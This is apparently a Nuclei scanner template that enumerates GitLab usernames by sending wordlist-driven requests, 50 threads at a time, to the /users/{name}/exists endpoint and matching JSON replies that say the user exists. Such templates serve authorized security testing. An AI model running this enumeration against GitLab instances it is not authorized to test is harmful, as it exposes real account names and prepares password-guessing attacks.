id: gitlab-user-enumeration

info:
  author: Suman_Kar
  name: GitLab - User Enumeration
  severity: info
  tags: gitlab,enumeration,fuzz

  # Username source - https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/malenames-usa-top1000.txt

requests:
  - payloads:
      user: helpers/wordlists/user-list.txt
    attack: sniper
    threads: 50

    raw:
      - |
        GET /users/{{user}}/exists HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en-US,en;q=0.9
        Accept: application/json, text/plain, */*
        Referer: {{BaseURL}}
        Connection: keep-alive

    matchers-condition: and
    matchers:

      - type: regex
        part: body
        regex:
          - "exists.*:true"

      - type: status
        status:
          - 200

      - type: word
        words:
          - "application/json"
        part: header